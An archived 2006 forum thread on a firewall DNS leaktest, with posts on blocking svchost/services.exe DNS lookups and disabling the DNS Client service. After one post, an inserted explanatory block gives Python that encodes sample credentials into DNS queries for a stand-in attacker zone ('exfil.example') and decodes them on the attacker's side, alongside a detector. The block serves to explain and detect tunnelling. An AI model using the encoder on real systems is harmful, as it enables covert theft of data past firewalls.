DNS Tester - leaktest

Discussion in 'other firewalls' started by djg05, Sep 23, 2006.

Thread Status:
Not open for further replies.
  1. djg05

    djg05 Registered Member

    Joined:
    Apr 6, 2005
    Posts:
    1,504
    DNS Tester - leaktest for Kerio 2.1.5

    This is one test that fails under Kerio 2.1.5. If you disable the DNS rule then it fails so it should be possible to tighten it up. The only way I can see is to set a DNS rule for each program that is allowed access, but this seems over the top and there should be a simpler way to do it. Any suggestions please.

    Another thing is how relevant is this test to being a real threat?
     
    Last edited: Sep 25, 2006
  2. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    I did that a year or so ago, just to try it. It doesn't take much time to configure the rules.

    At the time, I was not aware of any other way, and haven't searched around other forums recently.

    I was not convinced it was a real threat, and when I cleaned house earlier this year, I went back to my original DNS rules.

    These leak tests simulate what would happen if such malware somehow got installed and was permitted to run. I'm confident that won't happen, so I don't worry about them.

    regards,

    -rich

    ________________________________________________________________
    "Talking About Security Can Lead To Anxiety, Panic, And Dread...
    Or Cool Assessments, Common Sense And Practical Planning..."
    --Bruce Schneier
     
  3. djg05

    djg05 Registered Member

    Joined:
    Apr 6, 2005
    Posts:
    1,504
    Re: DNS Tester - leaktest for Kerio 2.1.5


    Thanks

    It might not be a real threat but am interested if it could be made to resist this test. It seems that in Win 2k, Services.exe is the point of failure. Cannot find any way of restricting it to prevent the escape. I have set the outgoing address range to my DNS address, local ports 1400 to 1600 and remote port 53.

    This is the first allowed rule and I put a block in underneath to stop anything else being allowed.
     
  4. djg05

    djg05 Registered Member

    Joined:
    Apr 6, 2005
    Posts:
    1,504
    Think I might have found the answer.

    Saw here that disabling the DNS service in Windows and then setting the rules for each application will defeat it - but I could be wrong.
     
  5. gkweb

    gkweb Expert Firewall Tester

    Joined:
    Aug 29, 2003
    Posts:
    1,932
    Location:
    FRANCE, Rouen (76)
    Hello,

    Disabling the DNS service will prevent the leaktest from working, that's true, but keep in mind that a real trojan exploiting this weakness will start the service back up before using it.

    The best, if you are worried about this issue, is to install a firewall handling the DNS call and prompting for it, even when the DNS service is enabled.
    Lastly I've tried Outpost V4.0 RC4 (still not final) and it handles it well, for instance.
    You could also monitor the service starts with an HIPS, and block it when it's the DNS client.

    Regards,
    gkweb.
     
  6. Tommy

    Tommy Registered Member

    Joined:
    Dec 24, 2002
    Posts:
    1,169
    Location:
    Buenos Aires - Munic
    Link for this test please. I want to check Jetico v2 against it.
     
  7. gkweb

    gkweb Expert Firewall Tester

    Joined:
    Aug 29, 2003
    Posts:
    1,932
    Location:
    FRANCE, Rouen (76)
  8. Stem

    Stem Firewall Expert

    Joined:
    Oct 5, 2005
    Posts:
    4,948
    Location:
    UK
    Yes, good interception on OP part.(and clear/understandable warning)
     
  9. cprtech

    cprtech Registered Member

    Joined:
    Feb 26, 2006
    Posts:
    335
    Location:
    Canada
    For additional restrictiveness, it must also make sense to ensure the DNS IP(s) are correct as well, which could be the router's LAN IP or the ISP's DNS IPs?
     
  10. djg05

    djg05 Registered Member

    Joined:
    Apr 6, 2005
    Posts:
    1,504
    Yes, but I use a layered approach and hopefully either PG or BOClean will stop it.
     
  11. Stem

    Stem Firewall Expert

    Joined:
    Oct 5, 2005
    Posts:
    4,948
    Location:
    UK
    I have always disabled the DNS client, and have the services monitored,.. but,.. I always place a rule (with alert) to block services (W2K) / svchost (XP) from making DNS lookups.
     
  12. gkweb

    gkweb Expert Firewall Tester

    Joined:
    Aug 29, 2003
    Posts:
    1,932
    Location:
    FRANCE, Rouen (76)
    @cprtech
    It's indeed a good practice to restrict DNS communications to your ISP DNS servers' IP. Unfortunately, crafted DNS requests can be made to send information to the attacker's DNS server. The way DNS works, the packet will be sent first to your ISP DNS server, which then will forward it to the attacker's server. IP restriction in this case doesn't help, but it is anyway a general good practice to follow.

    @djg05
    That's what I suggest when I said :
    When using a layered approach, you can prevent such a DNS exploit by preventing the service from starting, provided your HIPS can do this.

    Regards,
    gkweb.
     
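The mechanism gkweb describes above (data smuggled out inside query names that the ISP resolver forwards on to an attacker-controlled zone, so an IP restriction on port 53 does not help) is worth seeing concretely. The following is an added example, not code from the thread or from any leaktest or firewall mentioned here. It assumes a hypothetical attacker zone `exfil.example`, a constructed secret string, and a constructed list of benign query names; it builds the RFC 1035 query packets the host would emit, shows how the attacker's side reassembles the data, and runs a simple detector over the batch of names, which is the kind of check a firewall or HIPS rule on the resolver process cannot express on its own.

```python
import base64
import math
import struct
from collections import defaultdict

EXFIL_ZONE = "exfil.example"   # hypothetical attacker-controlled zone (assumption)
MAX_LABEL = 63                 # RFC 1035 per-label limit
MAX_NAME = 253                 # practical limit for a presentation-format name

# Constructed sample data, not a real capture.
SECRET = b"user=admin;pass=hunter2;host=WKSTN-02;" * 3
BENIGN_QUERIES = [
    "www.microsoft.com",
    "download.windowsupdate.com",
    "v4.windowsupdate.microsoft.com",
    "mail.google.com",
]

def encode_exfil_names(data: bytes, zone: str = EXFIL_ZONE, chunk: int = 30) -> list:
    """Attacker side: split data into base32 chunks, one query name per chunk.
    A recursive resolver forwards each name to zone's authoritative server,
    so the data leaves the network even if port 53 is restricted to the ISP resolver."""
    names = []
    for seq, i in enumerate(range(0, len(data), chunk)):
        label = base64.b32encode(data[i:i + chunk]).decode().rstrip("=").lower()
        name = f"{seq}.{label}.{zone}"
        assert len(label) <= MAX_LABEL and len(name) <= MAX_NAME
        names.append(name)
    return names

def decode_exfil_names(names: list) -> bytes:
    """Attacker's authoritative server: reorder by sequence label and decode."""
    parts = []
    for name in names:
        seq, label = name.split(".")[:2]
        padded = label.upper() + "=" * (-len(label) % 8)
        parts.append((int(seq), base64.b32decode(padded)))
    return b"".join(chunk for _, chunk in sorted(parts))

def build_query(name: str, txid: int = 0x1234) -> bytes:
    """Minimal DNS query on the wire: header (RD=1, one question), QNAME, QTYPE=A, QCLASS=IN."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.rstrip(".").split("."))
    return header + qname + b"\x00" + struct.pack("!HH", 1, 1)

def parse_qname(packet: bytes) -> str:
    """Detector side: read the question name back out of a query packet."""
    off, labels = 12, []
    while packet[off] != 0:
        n = packet[off]
        if n & 0xC0:
            raise ValueError("compression pointer in question name")
        labels.append(packet[off + 1:off + 1 + n].decode("ascii"))
        off += 1 + n
    return ".".join(labels)

def shannon_entropy(s: str) -> float:
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def split_zone(name: str):
    """Naive zone split (last two labels); real code would use a public suffix list."""
    labels = name.rstrip(".").split(".")
    return ".".join(labels[-2:]), ".".join(labels[:-2])

def flag_exfil(query_names: list, long_label: int = 30, min_len: int = 16,
               high_entropy: float = 4.0, volume: int = 20) -> dict:
    """Heuristic covert-channel check over a batch of names. Returns {name: [reasons]}.
    Flags a subdomain label that is unusually long or (if long enough to measure)
    high-entropy, and notes zones receiving many distinct names. Tune thresholds
    against your own traffic; these values are illustrative."""
    by_zone = defaultdict(set)
    for n in query_names:
        zone, sub = split_zone(n)
        by_zone[zone].add(sub)
    flagged = {}
    for n in query_names:
        zone, sub = split_zone(n)
        reasons = []
        for label in (sub.split(".") if sub else []):
            if len(label) >= long_label:
                reasons.append(f"label length {len(label)}")
            elif len(label) >= min_len and shannon_entropy(label) >= high_entropy:
                reasons.append(f"label entropy {shannon_entropy(label):.2f}")
        if len(by_zone[zone]) >= volume:
            reasons.append(f"{len(by_zone[zone])} distinct names under {zone}")
        if reasons:
            flagged[n] = reasons
    return flagged

if __name__ == "__main__":
    leak = encode_exfil_names(SECRET)
    seen = [parse_qname(build_query(n)) for n in BENIGN_QUERIES + leak]
    for name, reasons in flag_exfil(seen).items():
        print(name, "->", "; ".join(reasons))
    print("attacker recovered:", decode_exfil_names(leak) == SECRET)
```

The point of the round trip is that every packet `build_query` produces is a perfectly ordinary A query to the configured resolver, which is all a per-process port 53 rule sees; the only thing that distinguishes it is the shape of the name and the volume of distinct names, so that is where a detection rule has to look.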
  13. Climenole

    Climenole Look 'n' Stop Expert

    Joined:
    Jun 3, 2005
    Posts:
    1,640
    Hi :)

    Just one remark.

    The DNS requests are done by the applications not svchost.

    [And, talking about this, the DNS client service in W xp is totally useless ...]

    An example of DNS req. by an application is the DNS leaks with Tor (The onion router) and Firefox. Even with a rule allowing only Tor to access DNS in UDP on remote port 53, the application makes its own DNS requests. I found no parameters in the application to stop this. (Some early versions of Firefox had an option in about:config to avoid this but now the parameter has no effect ...)

    The only way I found to stop DNS leaks was to block the UDP port 53 for each application I'm using with Tor (Firefox, Thunderbird, Chatzilla+Xulrunner, 40tude Dialog and so on).

    Hope this helps.
    :)
     
  14. gkweb

    gkweb Expert Firewall Tester

    Joined:
    Aug 29, 2003
    Posts:
    1,932
    Location:
    FRANCE, Rouen (76)
    When the Windows "DNS Client" service is enabled, all the DNS requests are made by svchost.exe (WinXP). When it is disabled, every app does it by itself indeed.

    Even when the DNS service is enabled, it may be possible for an app to bypass it and to do the DNS request itself (I don't know), but then lucky for you, any firewall will prompt you for this, it's not the issue.
    The issue is when an application with no network access at all can send data without being seen from your firewall, which only notices svchost.

    FireFox is not a leaktest nor a trojan fortunately :)

    Regards,
    gkweb.
     
  15. djg05

    djg05 Registered Member

    Joined:
    Apr 6, 2005
    Posts:
    1,504
    Thanks for that Stem - I did not know about that so is now done.

    Is there any chance of setting up a sticky for suggested blocking rules or services stopped from a security point of view? I am sure there are many I and others are unaware of.
     
  16. Stem

    Stem Firewall Expert

    Joined:
    Oct 5, 2005
    Posts:
    4,948
    Location:
    UK
    There are sites that give this info, but I could make a post to show you the services I disable /blocking rules I put in place in my own setup, if you think this would help you. (you would want W2K setup, yes?)
     
  17. cprtech

    cprtech Registered Member

    Joined:
    Feb 26, 2006
    Posts:
    335
    Location:
    Canada
    Thank you gkweb. Geez, that malware is sneaky :eek:
     
  18. djg05

    djg05 Registered Member

    Joined:
    Apr 6, 2005
    Posts:
    1,504
    That would be handy Stem, and yes for 2k, but I assume others would like to see some for XP as well.
     
  19. gkweb

    gkweb Expert Firewall Tester

    Joined:
    Aug 29, 2003
    Posts:
    1,932
    Location:
    FRANCE, Rouen (76)
    An example of Stem's advice with Outpost v4.
    Select SVCHOST (for WinXP, services.exe for Win2K) and add this rule :

    http://perso.orange.fr/jugesoftware/forum/op2.gif


    With the DNS service disabled, the rule is never triggered (each application individually is making the DNS request).
    As soon as I enable it, if I run Firefox, the following popup appears :

    http://perso.orange.fr/jugesoftware/forum/op1.gif

    A good way of being alerted if the service gets activated behind your back.

    @djg05
    It's not exactly what you are looking for, but you may find this link useful:
    http://www.firewallleaktester.com/advices.htm

    Regards,
    gkweb.
     
  20. cprtech

    cprtech Registered Member

    Joined:
    Feb 26, 2006
    Posts:
    335
    Location:
    Canada
    Hi gkweb,

    Isn't it better to set the action to "Ask", since blocking svchost prevents access to the MS Updates site? This is at least in my case, unless there is a way around eliminating the requirement for svchost connecting to port 53 using MS Updates.
     
  21. djg05

    djg05 Registered Member

    Joined:
    Apr 6, 2005
    Posts:
    1,504
    Thanks for the link

    Re the rule. Perhaps you should also check that it is near the top, or that there is nothing above it that something can slip out through, assuming it is a top-down f/w.
     
  22. gkweb

    gkweb Expert Firewall Tester

    Joined:
    Aug 29, 2003
    Posts:
    1,932
    Location:
    FRANCE, Rouen (76)
    About the Outpost rule example for svchost, indeed blocking it will also block MS updates. A tradeoff between security and usability would be to uncheck the rule only when enabling automatic update for 1 min (time to check if there are available updates).

    The other possibility, is to uncheck the system global rules allowing DNS for every app, and to not add a DNS rule for svchost. Thus, as soon as svchost needs a DNS request, your firewall will display a popup (that you can choose to accept only if you do windows updates).

    Finally, the most secure, but also the least usable and user-friendly, is to remove the global DNS rules (as said above), to block svchost from doing DNS requests, and to manually update Windows with Internet Explorer and the Windows Update website. Updating Windows this way does not require DNS access for svchost (or services.exe under Win2K). Of course do not forget to disable the "DNS client" service before doing this, or you will be unable to browse anything as svchost will try to do all DNS requests, which will be blocked.
    You can even remove the HTTP and HTTPS rules if you choose this solution, you then will have to accept "once" every time you manually update your Windows. Just keep the DHCP rule if you need it.

    Regards,
    gkweb.
     
    Last edited: Sep 26, 2006